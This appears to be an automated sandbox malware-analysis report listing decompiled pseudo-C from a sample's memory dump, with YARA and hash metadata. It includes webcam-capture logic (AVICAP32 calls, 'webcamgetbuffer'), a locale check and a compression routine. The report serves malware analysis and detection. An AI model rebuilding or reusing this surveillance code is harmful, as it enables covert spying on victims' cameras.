										__eflags = _v36 - 0x5b0;
										if(_v36 < 0x5b0) {
											goto L39;
										}
										return 1;
									}
								} else {
									goto L27;
								}
								do {
									L27:
									_t265 =  *_v72;
									__eflags = _t265;
									if(_t265 != 0) {
										_t266 = _t265 & 0x0000ffff;
										_t73 = _t389 + _t266 * 2 - 0x84;
										 *_t73 =  *(_t389 + _t266 * 2 - 0x84) + 1;
										__eflags =  *_t73;
										 *((short*)(_a4 + ( *(_t389 + _t266 * 2 - 0x84) & 0x0000ffff) * 2)) = _t348;
									}
									_t348 = _t348 + 1;
									_v72 =  &(_v72[1]);
									__eflags = _t289 - _t348;
								} while (_t289 > _t348);
								goto L30;
							}
							__eflags = _v8;
							if(_v8 == 0) {
								L23:
								return _t241 | 0xffffffff;
							}
							__eflags = _v24 - 1;
							if(_v24 == 1) {
								goto L24;
							}
							goto L23;
						}
						return _t241 | 0xffffffff;
					}
					_v52 = 0x40;
					_v51 = 1;
					_v50 = 0;
					_t382 = _a12;
					 *_t382 =  *_t382 + 4;
					 *((intOrPtr*)( *_t382)) = _v52;
					_t383 = _a12;
					 *_t383 =  *_t383 + 4;
					 *((intOrPtr*)( *_t383)) = _v52;
					 *_a8 = 1;
					return 0;
				} else {
					goto L3;
				}
				do {
					L3:
					_t288 =  *_t237 & 0x0000ffff;
					_t237 =  &(_t237[1]);
					_t338 = _t338 + 1;
					 *((short*)(_t389 + _t288 * 2 - 0x64)) =  *((short*)(_t389 + _t288 * 2 - 0x64)) + 1;
				} while (__ecx > _t338);
				goto L4;
			}






















































                                    0x240334cc
                                    0x240334d8
                                    0x240334db
                                    0x240334e0
                                    0x240334e3
                                    0x240334e6
                                    0x240334e6
                                    0x240334eb
                                    0x240334ee
                                    0x240334f1
                                    0x240334f7
                                    0x240334f9
                                    0x240334fe
                                    0x24033510
                                    0x24033515
                                    0x24033518
                                    0x2403351b
                                    0x24033522
                                    0x24033528
                                    0x2403352b
                                    0x24033532
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x24033532
                                    0x2403353a
                                    0x2403353f
                                    0x2403353f
                                    0x24033546
                                    0x24033580
                                    0x2403358a
                                    0x2403358d
                                    0x24033590
                                    0x24033594
                                    0x00000000
                                    0x00000000
                                    0x24033596
                                    0x24033599
                                    0x2403359d
                                    0x240335a1
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x240335a1
                                    0x240335a6
                                    0x240335a9
                                    0x240335ae
                                    0x240335ae
                                    0x240335b1
                                    0x240335b8
                                    0x240335bd
                                    0x240335c0
                                    0x240335c5
                                    0x240335c7
                                    0x240335c9
                                    0x00000000
                                    0x00000000
                                    0x240335d3
                                    0x240335d6
                                    0x240335d9
                                    0x240335dd
                                    0x00000000
                                    0x00000000
                                    0x240335df
                                    0x240335e1
                                    0x240335f7
                                    0x240335f7
                                    0x24033600
                                    0x2403360a
                                    0x24033610
                                    0x24033613
                                    0x2403361c
                                    0x24033620
                                    0x24033623
                                    0x24033626
                                    0x2403362a
                                    0x2403362a
                                    0x24033630
                                    0x24033635
                                    0x24033638
                                    0x2403363a
                                    0x2403366d
                                    0x24033670
                                    0x24033673
                                    0x24033679
                                    0x2403367c
                                    0x2403367f
                                    0x24033682
                                    0x24033675
                                    0x24033675
                                    0x2403368b
                                    0x24033692
                                    0x24033699
                                    0x240336a0
                                    0x240336a7
                                    0x24033677
                                    0x240336b0
                                    0x240336b7
                                    0x240336be
                                    0x240336be
                                    0x24033675
                                    0x240336cd
                                    0x240336d0
                                    0x240336db
                                    0x240336de
                                    0x240336e1
                                    0x240336e4
                                    0x240336f0
                                    0x240336f7
                                    0x240336fa
                                    0x240336fe
                                    0x24033713
                                    0x24033719
                                    0x2403371c
                                    0x24033722
                                    0x24033728
                                    0x2403372b
                                    0x2403372e
                                    0x24033731
                                    0x2403373d
                                    0x24033740
                                    0x24033758
                                    0x2403375c
                                    0x24033742
                                    0x24033748
                                    0x24033752
                                    0x24033752
                                    0x24033733
                                    0x24033733
                                    0x24033737
                                    0x24033737
                                    0x24033776
                                    0x24033778
                                    0x2403377e
                                    0x24033781
                                    0x24033781
                                    0x24033781
                                    0x24033794
                                    0x24033797
                                    0x24033797
                                    0x240337a6
                                    0x240337ac
                                    0x240337ac
                                    0x240337ae
                                    0x00000000
                                    0x00000000
                                    0x240337aa
                                    0x240337aa
                                    0x240337aa
                                    0x240337b0
                                    0x240337b2
                                    0x240337bd
                                    0x240337bd
                                    0x240337b4
                                    0x240337b9
                                    0x240337b9
                                    0x240337bf
                                    0x240337c3
                                    0x240337c6
                                    0x240337d0
                                    0x240337d3
                                    0x240337f1
                                    0x240337f4
                                    0x240337f7
                                    0x00000000
                                    0x2403371c
                                    0x2403371c
                                    0x24033722
                                    0x24033728
                                    0x2403372b
                                    0x2403372e
                                    0x24033731
                                    0x2403373d
                                    0x24033740
                                    0x24033758
                                    0x2403375c
                                    0x24033742
                                    0x24033748
                                    0x24033752
                                    0x24033752
                                    0x24033733
                                    0x24033733
                                    0x24033737
                                    0x24033737
                                    0x24033776
                                    0x24033778
                                    0x2403377e
                                    0x00000000
                                    0x2403377e
                                    0x00000000
                                    0x2403371c
                                    0x2403380b
                                    0x2403380f
                                    0x24033814
                                    0x24033814
                                    0x2403381d
                                    0x24033823
                                    0x2403382d
                                    0x2403383f
                                    0x24033842
                                    0x24033844
                                    0x24033847
                                    0x00000000
                                    0x00000000
                                    0x24033836
                                    0x24033838
                                    0x2403383a
                                    0x00000000
                                    0x00000000
                                    0x2403383c
                                    0x2403383d
                                    0x2403383d
                                    0x2403383d
                                    0x24033852
                                    0x24033855
                                    0x24033859
                                    0x2403386e
                                    0x24033873
                                    0x24033879
                                    0x2403387e
                                    0x24033887
                                    0x2403388e
                                    0x24033890
                                    0x24033892
                                    0x24033894
                                    0x24033894
                                    0x24033894
                                    0x2403389d
                                    0x00000000
                                    0x2403389d
                                    0x2403385b
                                    0x24033862
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x24033864
                                    0x240337fd
                                    0x24033802
                                    0x240337d5
                                    0x240337d8
                                    0x240337db
                                    0x240338a7
                                    0x240338b1
                                    0x240338b4
                                    0x240338ba
                                    0x240338bc
                                    0x2403391d
                                    0x24033926
                                    0x2403392e
                                    0x24033930
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x240338be
                                    0x240338be
                                    0x240338be
                                    0x240338c2
                                    0x240338c9
                                    0x240338cc
                                    0x240338ce
                                    0x240338d0
                                    0x240338d6
                                    0x240338de
                                    0x240338e4
                                    0x240338e4
                                    0x240338cc
                                    0x240338f4
                                    0x24033900
                                    0x24033906
                                    0x24033906
                                    0x24033908
                                    0x00000000
                                    0x00000000
                                    0x24033904
                                    0x24033904
                                    0x24033904
                                    0x2403390a
                                    0x2403390a
                                    0x2403390c
                                    0x24033917
                                    0x24033917
                                    0x2403390e
                                    0x24033913
                                    0x24033913
                                    0x24033919
                                    0x24033919
                                    0x00000000
                                    0x240338be
                                    0x240337ee
                                    0x00000000
                                    0x240337ee
                                    0x240337d3
                                    0x24033700
                                    0x24033700
                                    0x24033707
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x24033709
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x2403363c
                                    0x2403363c
                                    0x2403363f
                                    0x24033642
                                    0x24033645
                                    0x24033647
                                    0x24033652
                                    0x24033652
                                    0x24033652
                                    0x24033660
                                    0x24033660
                                    0x24033664
                                    0x24033665
                                    0x24033669
                                    0x24033669
                                    0x00000000
                                    0x2403363c
                                    0x240335e3
                                    0x240335e7
                                    0x240335ef
                                    0x00000000
                                    0x240335ef
                                    0x240335e9
                                    0x240335ed
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x240335ed
                                    0x00000000
                                    0x240335cb
                                    0x24033548
                                    0x2403354c
                                    0x24033550
                                    0x24033556
                                    0x2403355b
                                    0x24033561
                                    0x24033563
                                    0x24033568
                                    0x2403356e
                                    0x24033575
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x24033500
                                    0x24033500
                                    0x24033500
                                    0x24033503
                                    0x24033506
                                    0x24033507
                                    0x2403350c
                                    0x00000000

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: @
                                    • API String ID: 0-2766056989
                                    • Opcode ID: b0e4988768a89bf1d161a93f8cdfd480e75c3e57f25776fff8ebe7ca698f9577
                                    • Instruction ID: 66b66a26a318658dd4baf729009094ad9504a2d7a87bfcf0e0158fc69e2f52d2
                                    • Opcode Fuzzy Hash: b0e4988768a89bf1d161a93f8cdfd480e75c3e57f25776fff8ebe7ca698f9577
                                    • Instruction Fuzzy Hash: E0F14674E00259CFCB14CF98C580AEEBFB2FF88314F2081A9D851AB355D7B59A85CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2403B690, Relevance: 1.5, APIs: 1, Instructions: 22nativeCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 54%
                                    			E2403B690(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _t7;
				intOrPtr _t10;
				intOrPtr _t11;

				_t10 = _a8;
				_push(_a16);
				_push(_a12);
				_push(_t10);
				_t7 = _a4;
				_push(_t7);
				L24015258();
				_t11 = _t7;
				if(_t10 == 2) {
					E2403B624();
				}
				return _t11;
			}






                                    0x2403b695
                                    0x2403b69b
                                    0x2403b69f
                                    0x2403b6a0
                                    0x2403b6a1
                                    0x2403b6a4
                                    0x2403b6a5
                                    0x2403b6aa
                                    0x2403b6af
                                    0x2403b6b1
                                    0x2403b6b1
                                    0x2403b6bb

                                    APIs
                                    • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 2403B6A5
                                      • Part of subcall function 2403B624: 6F6121E0.AVICAP32(Video,50000000,00000000,00000000,00000280,000001E0,?,00000001,24049038,000003E8,000003E8,2404E184,webcamgetbuffer,2404E184,webcam,2404E184), ref: 2403B644
                                      • Part of subcall function 2403B624: SendMessageA.USER32(?,0000040B,00000000,00000000), ref: 2403B65D
                                      • Part of subcall function 2403B624: UnregisterClassA.USER32(MainForm,?), ref: 2403B674
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ClassF6121MessageNtdllProc_SendUnregisterWindow
                                    • String ID:
                                    • API String ID: 3444105186-0
                                    • Opcode ID: 74626c36f2ce0fe2ba0b25495e6ac0bbee8d73dfe1dc0e3524e6ddd753c88333
                                    • Instruction ID: 4c97633e9dcd4564c4d4bcf3a2ad2d8922b0fff57890820c02e54d9b993c066c
                                    • Opcode Fuzzy Hash: 74626c36f2ce0fe2ba0b25495e6ac0bbee8d73dfe1dc0e3524e6ddd753c88333
                                    • Instruction Fuzzy Hash: 45D0627260015C6B9B10EDE9DCC0C9BB7ECEB59164B504511FE18D7202D575DD5087B1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24018F80, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E24018F80(void* __eax, void* __ecx) {
				char _v12;
				signed int _t9;
				void* _t11;
				void* _t16;
				void* _t17;

				_t17 = _t16 + 0xfffffff8;
				_t11 = __eax;
				E24013088(__eax);
				_t9 = GetLocaleInfoA(0x400, 0x5a,  &_v12, 5) & 0xffffff00 | _t8 == 0x00000003;
				if(_t9 != 0) {
					_t9 = E24013274(_t11, _t17);
				}
				return _t9;
			}








                                    0x24018f81
                                    0x24018f84
                                    0x24018f88
                                    0x24018fa3
                                    0x24018fa8
                                    0x24018fae
                                    0x24018fae
                                    0x24018fb6

                                    APIs
                                    • GetLocaleInfoA.KERNEL32(00000400,0000005A,00000005,00000005), ref: 24018F9B
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: InfoLocale
                                    • String ID:
                                    • API String ID: 2299586839-0
                                    • Opcode ID: c9fe7f58603b6435ac9e9672cc6855bd1ce640a3a3ce7cc5dae744b2cf1d1d0e
                                    • Instruction ID: 218279a9215700e63124332597f8b84e53135f3e76821fc1bb633a7ed156f9ca
                                    • Opcode Fuzzy Hash: c9fe7f58603b6435ac9e9672cc6855bd1ce640a3a3ce7cc5dae744b2cf1d1d0e
                                    • Instruction Fuzzy Hash: B5D095533487002BFC1081341C8170D53C49760335F500239F70CDF3C4C9A4C54D5657
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2402FD44, Relevance: .7, Instructions: 681COMMONCrypto
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E2402FD44(intOrPtr __eax, intOrPtr __edx) {
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _t398;
				signed int _t403;
				signed int _t410;
				signed int _t471;
				signed int _t483;
				signed int _t492;
				signed int _t498;
				signed int _t512;
				signed int _t520;
				signed char _t521;
				void* _t522;
				char _t539;
				signed int _t543;
				signed int _t554;
				intOrPtr* _t557;
				signed int _t581;
				signed int _t582;
				signed int _t587;
				signed int _t595;
				signed char* _t597;
				intOrPtr _t625;
				intOrPtr _t626;
				signed int _t673;
				void* _t674;
				void* _t675;
				void* _t676;
				signed int _t682;
				signed int _t691;
				intOrPtr _t693;
				intOrPtr _t694;
				intOrPtr _t695;
				signed int _t697;
				signed int _t698;
				signed int _t699;
				intOrPtr* _t701;

				_t694 = __edx;
				_t695 = __eax;
				if(__eax == 0 ||  *((intOrPtr*)(__eax + 0x1c)) == 0 || __edx > 4 || __edx < 0) {
					return 0xfffffffe;
				}
				_t557 =  *((intOrPtr*)(__eax + 0x1c));
				if( *((intOrPtr*)(__eax + 0xc)) == 0 ||  *((intOrPtr*)(__eax)) == 0 &&  *((intOrPtr*)(__eax + 4)) != 0 ||  *((intOrPtr*)(_t557 + 4)) == 0x29a && _t694 != 4) {
					_t398 =  *0x24057310; // 0x2402ee6c
					 *((intOrPtr*)(_t695 + 0x18)) = _t398;
					return 0xfffffffe;
				}
				if( *((intOrPtr*)(_t695 + 0x10)) == 0) {
					_t693 =  *0x2405731c; // 0x2402ee9c
					 *((intOrPtr*)(_t695 + 0x18)) = _t693;
					return 0xfffffffb;
				}
				 *_t557 = _t695;
				 *_t701 =  *((intOrPtr*)(_t557 + 0x28));
				 *((intOrPtr*)(_t557 + 0x28)) = _t694;
				if( *((intOrPtr*)(_t557 + 4)) == 0x2a) {
					if( *(_t557 + 0x18) != 2) {
						_t581 = ( *((intOrPtr*)(_t557 + 0x30)) - 8 << 4) + 8 << 8;
						if( *((intOrPtr*)(_t557 + 0x88)) >= 2 ||  *(_t557 + 0x84) < 2) {
							_t498 = 0;
						} else {
							_t512 =  *(_t557 + 0x84);
							if(_t512 >= 6) {
								if(_t512 != 6) {
									_t498 = 3;
								} else {
									_t498 = 2;
								}
							} else {
								_t498 = 1;
							}
						}
						_t582 = _t581 | _t498 << 0x00000006;
						if( *((intOrPtr*)(_t557 + 0x6c)) != 0) {
							_t582 = _t582 | 0x00000020;
						}
						 *((intOrPtr*)(_t557 + 4)) = 0x71;
						E2402FCC8(_t557, _t582 + 0x1f - _t582 % 0x1f);
						if( *((intOrPtr*)(_t557 + 0x6c)) != 0) {
							E2402FCC8(_t557,  *(_t695 + 0x30) >> 0x10);
							E2402FCC8(_t557,  *(_t695 + 0x30) & 0x0000ffff);
						}
						_t558 = 0;
						 *(_t695 + 0x30) = E2402F414(0, 0, 0);
					} else {
						 *(_t695 + 0x30) = E24035850(0, 0);
						 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
						 *( *(_t557 + 8) +  *(_t557 + 0x14)) = 0x1f;
						 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
						 *( *(_t557 + 8) +  *(_t557 + 0x14)) = 0x8b;
						 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
						 *( *(_t557 + 8) +  *(_t557 + 0x14)) = 8;
						if( *(_t557 + 0x1c) != 0) {
							if( *( *(_t557 + 0x1c)) == 0) {
								_t673 = 0;
							} else {
								_t673 = 1;
							}
							if( *((intOrPtr*)( *(_t557 + 0x1c) + 0x2c)) == 0) {
								_t587 = 0;
							} else {
								_t587 = 2;
							}
							_t674 = _t673 + _t587;
							if( *((intOrPtr*)( *(_t557 + 0x1c) + 0x10)) != 0) {
								_t520 = 4;
							} else {
								_t520 = 0;
							}
							_t675 = _t674 + _t520;
							if( *((intOrPtr*)( *(_t557 + 0x1c) + 0x1c)) != 0) {
								_t521 = 8;
							} else {
								_t521 = 0;
							}
							_t676 = _t675 + _t521;
							if( *((intOrPtr*)( *(_t557 + 0x1c) + 0x24)) != 0) {
								_t522 = 0x10;
							} else {
								_t522 = 0;
							}
							 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
							 *( *(_t557 + 8) +  *(_t557 + 0x14)) = _t676 + _t522;
							 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
							 *( *(_t557 + 8) +  *(_t557 + 0x14)) =  *( *(_t557 + 0x1c) + 4) & 0x000000ff;
							 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
							 *( *(_t557 + 8) +  *(_t557 + 0x14)) =  *( *(_t557 + 0x1c) + 4) >> 0x00000008 & 0x000000ff;
							 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
							 *( *(_t557 + 8) +  *(_t557 + 0x14)) =  *( *(_t557 + 0x1c) + 4) >> 0x00000010 & 0x000000ff;
							 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
							 *( *(_t557 + 8) +  *(_t557 + 0x14)) =  *( *(_t557 + 0x1c) + 4) >> 0x00000018 & 0x000000ff;
							_t682 =  *(_t557 + 0x14);
							 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
							_t595 =  *(_t557 + 8);
							if( *(_t557 + 0x84) != 9) {
								if( *((intOrPtr*)(_t557 + 0x88)) >= 2 ||  *(_t557 + 0x84) < 2) {
									_t539 = 4;
								} else {
									_t539 = 0;
								}
							} else {
								_t539 = 2;
							}
							 *((char*)(_t595 + _t682)) = _t539;
							 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
							_t558 =  *(_t557 + 8);
							 *( *(_t557 + 8) +  *(_t557 + 0x14)) =  *( *(_t557 + 0x1c) + 0xc) & 0x000000ff;
							_t543 =  *(_t557 + 0x1c);
							if( *((intOrPtr*)(_t543 + 0x10)) != 0) {
								 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
								_t597 =  *(_t557 + 8) +  *(_t557 + 0x14);
								 *_t597 =  *(_t543 + 0x14) & 0x000000ff;
								 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
								_t558 =  *( *(_t557 + 0x1c) + 0x14) >> 0x00000008 & 0x000000ff;
								 *( *(_t557 + 8) +  *(_t557 + 0x14)) =  *( *(_t557 + 0x1c) + 0x14) >> 0x00000008 & 0x000000ff;
							}
							if( *((intOrPtr*)( *(_t557 + 0x1c) + 0x2c)) != 0) {
								_t558 =  *(_t557 + 0x14);
								 *(_t695 + 0x30) = E24035850( *(_t557 + 0x14),  *(_t557 + 8));
							}
							 *((intOrPtr*)(_t557 + 0x20)) = 0;
							 *((intOrPtr*)(_t557 + 4)) = 0x45;
						} else {
							 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
							 *( *(_t557 + 8) +  *(_t557 + 0x14)) = 0;
							 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
							 *( *(_t557 + 8) +  *(_t557 + 0x14)) = 0;
							 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
							 *( *(_t557 + 8) +  *(_t557 + 0x14)) = 0;
							 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
							 *( *(_t557 + 8) +  *(_t557 + 0x14)) = 0;
							 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
							 *( *(_t557 + 8) +  *(_t557 + 0x14)) = 0;
							_t554 =  *(_t557 + 0x14);
							 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
							_t691 =  *(_t557 + 8);
							if( *(_t557 + 0x84) != 9) {
								if( *((intOrPtr*)(_t557 + 0x88)) >= 2 ||  *(_t557 + 0x84) < 2) {
									_t558 = 4;
								} else {
									_t558 = 0;
								}
							} else {
								_t558 = 2;
							}
							 *(_t691 + _t554) = _t558;
							 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
							 *( *(_t557 + 8) +  *(_t557 + 0x14)) = 0xb;
							 *((intOrPtr*)(_t557 + 4)) = 0x71;
						}
					}
				}
				if( *((intOrPtr*)(_t557 + 4)) != 0x45) {
					L78:
					if( *((intOrPtr*)(_t557 + 4)) != 0x49) {
						L94:
						if( *((intOrPtr*)(_t557 + 4)) != 0x5b) {
							L110:
							if( *((intOrPtr*)(_t557 + 4)) == 0x67) {
								_t558 =  *(_t557 + 0x1c);
								if( *((intOrPtr*)( *(_t557 + 0x1c) + 0x2c)) == 0) {
									 *((intOrPtr*)(_t557 + 4)) = 0x71;
								} else {
									if( *(_t557 + 0x14) + 2 >  *((intOrPtr*)(_t557 + 0xc))) {
										E2402FCF0(_t695, _t558);
									}
									if( *(_t557 + 0x14) + 2 <=  *((intOrPtr*)(_t557 + 0xc))) {
										 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
										 *( *(_t557 + 8) +  *(_t557 + 0x14)) =  *(_t695 + 0x30) & 0x000000ff;
										 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
										 *( *(_t557 + 8) +  *(_t557 + 0x14)) =  *(_t695 + 0x30) >> 0x00000008 & 0x000000ff;
										_t558 = 0;
										 *(_t695 + 0x30) = E24035850(0, 0);
										 *((intOrPtr*)(_t557 + 4)) = 0x71;
									}
								}
							}
							if( *(_t557 + 0x14) == 0) {
								if( *((intOrPtr*)(_t695 + 4)) != 0 || _t694 >  *_t701 || _t694 == 4) {
									goto L124;
								} else {
									_t626 =  *0x2405731c; // 0x2402ee9c
									 *((intOrPtr*)(_t695 + 0x18)) = _t626;
									return 0xfffffffb;
								}
							} else {
								E2402FCF0(_t695, _t558);
								if( *((intOrPtr*)(_t695 + 0x10)) != 0) {
									L124:
									if( *((intOrPtr*)(_t557 + 4)) != 0x29a ||  *((intOrPtr*)(_t695 + 4)) == 0) {
										if( *((intOrPtr*)(_t695 + 4)) != 0 ||  *((intOrPtr*)(_t557 + 0x74)) != 0 || _t694 != 0 &&  *((intOrPtr*)(_t557 + 4)) != 0x29a) {
											_v20 =  *((intOrPtr*)( *((intOrPtr*)(0x24057334 + ( *(_t557 + 0x84) +  *(_t557 + 0x84) * 2) * 4))))();
											if(_v20 == 2 || _v20 == 3) {
												 *((intOrPtr*)(_t557 + 4)) = 0x29a;
											}
											if(_v20 == 0 || _v20 == 2) {
												if( *((intOrPtr*)(_t695 + 0x10)) == 0) {
													 *((intOrPtr*)(_t557 + 0x28)) = 0xffffffff;
												}
												return 0;
											} else {
												if(_v20 != 1) {
													goto L146;
												}
												if(_t694 != 1) {
													_t558 = 0;
													E24034A80(_t557, 0, 0, 0);
													if(_t694 == 3) {
														_t558 =  *(_t557 + 0x4c);
														 *((short*)( *((intOrPtr*)(_t557 + 0x44)) +  *(_t557 + 0x4c) * 2 - 2)) = 0;
														E2402EED8( *((intOrPtr*)(_t557 + 0x44)), 0,  *(_t557 + 0x4c) - 1 +  *(_t557 + 0x4c) - 1);
													}
												} else {
													E24034B3C(_t557);
												}
												E2402FCF0(_t695, _t558);
												if( *((intOrPtr*)(_t695 + 0x10)) != 0) {
													goto L146;
												} else {
													 *((intOrPtr*)(_t557 + 0x28)) = 0xffffffff;
													return 0;
												}
											}
										} else {
											L146:
											if(_t694 == 4) {
												_t403 =  *(_t557 + 0x18);
												if(_t403 > 0) {
													if(_t403 != 2) {
														E2402FCC8(_t557,  *(_t695 + 0x30) >> 0x10);
														E2402FCC8(_t557,  *(_t695 + 0x30) & 0x0000ffff);
													} else {
														 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
														 *( *(_t557 + 8) +  *(_t557 + 0x14)) =  *(_t695 + 0x30) & 0x000000ff;
														 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
														 *( *(_t557 + 8) +  *(_t557 + 0x14)) =  *(_t695 + 0x30) >> 0x00000008 & 0x000000ff;
														 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
														 *( *(_t557 + 8) +  *(_t557 + 0x14)) =  *(_t695 + 0x30) >> 0x00000010 & 0x000000ff;
														 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
														 *( *(_t557 + 8) +  *(_t557 + 0x14)) =  *(_t695 + 0x30) >> 0x00000018 & 0x000000ff;
														 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
														 *( *(_t557 + 8) +  *(_t557 + 0x14)) =  *(_t695 + 8) & 0x000000ff;
														 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
														 *( *(_t557 + 8) +  *(_t557 + 0x14)) =  *(_t695 + 8) >> 0x00000008 & 0x000000ff;
														 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
														 *( *(_t557 + 8) +  *(_t557 + 0x14)) =  *(_t695 + 8) >> 0x00000010 & 0x000000ff;
														 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
														_t558 =  *(_t557 + 8);
														 *( *(_t557 + 8) +  *(_t557 + 0x14)) =  *(_t695 + 8) >> 0x00000018 & 0x000000ff;
													}
													E2402FCF0(_t695, _t558);
													_t410 =  *(_t557 + 0x18);
													if(_t410 > 0) {
														 *(_t557 + 0x18) =  ~_t410;
													}
													if( *(_t557 + 0x14) == 0) {
														return 1;
													} else {
														return 0;
													}
												}
												return 1;
											}
											return 0;
										}
									} else {
										_t625 =  *0x2405731c; // 0x2402ee9c
										 *((intOrPtr*)(_t695 + 0x18)) = _t625;
										return 0xfffffffb;
									}
								}
								 *((intOrPtr*)(_t557 + 0x28)) = 0xffffffff;
								return 0;
							}
						}
						if( *((intOrPtr*)( *(_t557 + 0x1c) + 0x24)) == 0) {
							 *((intOrPtr*)(_t557 + 4)) = 0x67;
							goto L110;
						}
						_t697 =  *(_t557 + 0x14);
						do {
							if( *(_t557 + 0x14) !=  *((intOrPtr*)(_t557 + 0xc))) {
								goto L103;
							}
							if( *((intOrPtr*)( *(_t557 + 0x1c) + 0x2c)) != 0 && _t697 <  *(_t557 + 0x14)) {
								_t558 =  *(_t557 + 0x14) - _t697;
								 *(_t695 + 0x30) = E24035850( *(_t557 + 0x14) - _t697,  *(_t557 + 8) + _t697);
							}
							E2402FCF0(_t695, _t558);
							_t471 =  *(_t557 + 0x14);
							_t697 = _t471;
							if(_t471 ==  *((intOrPtr*)(_t557 + 0xc))) {
								_v24 = 1;
								break;
							}
							L103:
							 *((intOrPtr*)(_t557 + 0x20)) =  *((intOrPtr*)(_t557 + 0x20)) + 1;
							_v24 =  *( *((intOrPtr*)( *(_t557 + 0x1c) + 0x24)) +  *((intOrPtr*)(_t557 + 0x20))) & 0x000000ff;
							 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
							_t558 =  *(_t557 + 8);
							 *( *(_t557 + 8) +  *(_t557 + 0x14)) = _v24;
						} while (_v24 != 0);
						if( *((intOrPtr*)( *(_t557 + 0x1c) + 0x2c)) != 0 && _t697 <  *(_t557 + 0x14)) {
							_t558 =  *(_t557 + 0x14) - _t697;
							 *(_t695 + 0x30) = E24035850( *(_t557 + 0x14) - _t697,  *(_t557 + 8) + _t697);
						}
						if(_v24 == 0) {
							 *((intOrPtr*)(_t557 + 4)) = 0x67;
						}
						goto L110;
					}
					if( *((intOrPtr*)( *(_t557 + 0x1c) + 0x1c)) == 0) {
						 *((intOrPtr*)(_t557 + 4)) = 0x5b;
						goto L94;
					}
					_t698 =  *(_t557 + 0x14);
					do {
						if( *(_t557 + 0x14) !=  *((intOrPtr*)(_t557 + 0xc))) {
							goto L87;
						}
						if( *((intOrPtr*)( *(_t557 + 0x1c) + 0x2c)) != 0 && _t698 <  *(_t557 + 0x14)) {
							_t558 =  *(_t557 + 0x14) - _t698;
							 *(_t695 + 0x30) = E24035850( *(_t557 + 0x14) - _t698,  *(_t557 + 8) + _t698);
						}
						E2402FCF0(_t695, _t558);
						_t483 =  *(_t557 + 0x14);
						_t698 = _t483;
						if(_t483 ==  *((intOrPtr*)(_t557 + 0xc))) {
							_v28 = 1;
							break;
						}
						L87:
						 *((intOrPtr*)(_t557 + 0x20)) =  *((intOrPtr*)(_t557 + 0x20)) + 1;
						_v28 =  *( *((intOrPtr*)( *(_t557 + 0x1c) + 0x1c)) +  *((intOrPtr*)(_t557 + 0x20))) & 0x000000ff;
						 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
						_t558 =  *(_t557 + 8);
						 *( *(_t557 + 8) +  *(_t557 + 0x14)) = _v28;
					} while (_v28 != 0);
